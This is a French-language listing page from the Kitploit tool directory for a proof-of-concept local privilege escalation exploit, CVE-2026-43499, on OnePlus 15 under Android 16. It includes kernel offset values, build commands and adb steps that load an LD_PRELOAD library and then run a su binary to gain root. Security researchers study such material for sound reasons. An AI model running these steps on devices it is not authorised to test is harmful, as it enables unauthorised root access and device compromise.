Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-43499-OnePlus15 — Preuve de concept à visée éducative pour l’élévation de privilèges locale sous Android 16 sur OnePlus 15, avec détection des offsets du noyau, génération de cibles et construction de l’exploit basée sur LD_PRELOAD. | Kitploit
Outils/GitHubGitHub/bartixxx32/cve-2026-43499-oneplus15
Sécurité AndroidEscalade de PrivilègesExploitationSécurité MobileApprentissage et ÉducationDéveloppement de Charges UtilesExploitation de Binaires
GitHubbartixxx32/cve-2026-43499-oneplus15

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-43499-OnePlus15

Preuve de concept à visée éducative pour l’élévation de privilèges locale sous Android 16 sur OnePlus 15, avec détection des offsets du noyau, génération de cibles et construction de l’exploit basée sur LD_PRELOAD.

Voir le dépôt
6317il y a 2 moisPas encore vérifié

CVE-2026-43499 — OnePlus 15 LPE (PoC éducatif)

AVERTISSEMENT : Ce dépôt est fourni uniquement à des fins éducatives et de recherche. Aucun binaire pré-construit ni version n'est distribué. Vous devez tout compiler à partir des sources.

Escalade de privilèges locale Android 16 pour OnePlus 15.

Fork de x-spy/CVE-2026-43499-popsicle avec un correctif d'alignement kallsyms et un profil vérifié pour OnePlus 15.

Profil

Le profil contient deux adresses physiques qui doivent être confirmées depuis un appareil rooté exécutant le même firmware :

{
  "p0_phys_offset": "0x80000000",
  "p0_kernel_phys_load": "0xc7800000"
}

Auto-détection avec un appareil rooté :

python3 detect_offset.py

Générer la cible

Nécessite Python 3 et llvm-objdump :

python3 generate_target.py \
  --boot boot.img \
  --profile profile_oneplus15.json \
  -o source/src/target.h

Compilation

make -C source clean preload

Si le NDK n'est pas détecté automatiquement :

NDK_ROOT=/path/to/android-ndk make -C source clean preload

Sortie : source/build/bin/preload.so

Exécution

adb push source/build/bin/preload.so /data/local/tmp/preload.so
adb shell chmod 0644 /data/local/tmp/preload.so
adb shell LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true
adb shell /data/local/tmp/su -c id

Crédits

  • x-spy pour l'exploit original et la découverte de la CVE
Télécharger l’outil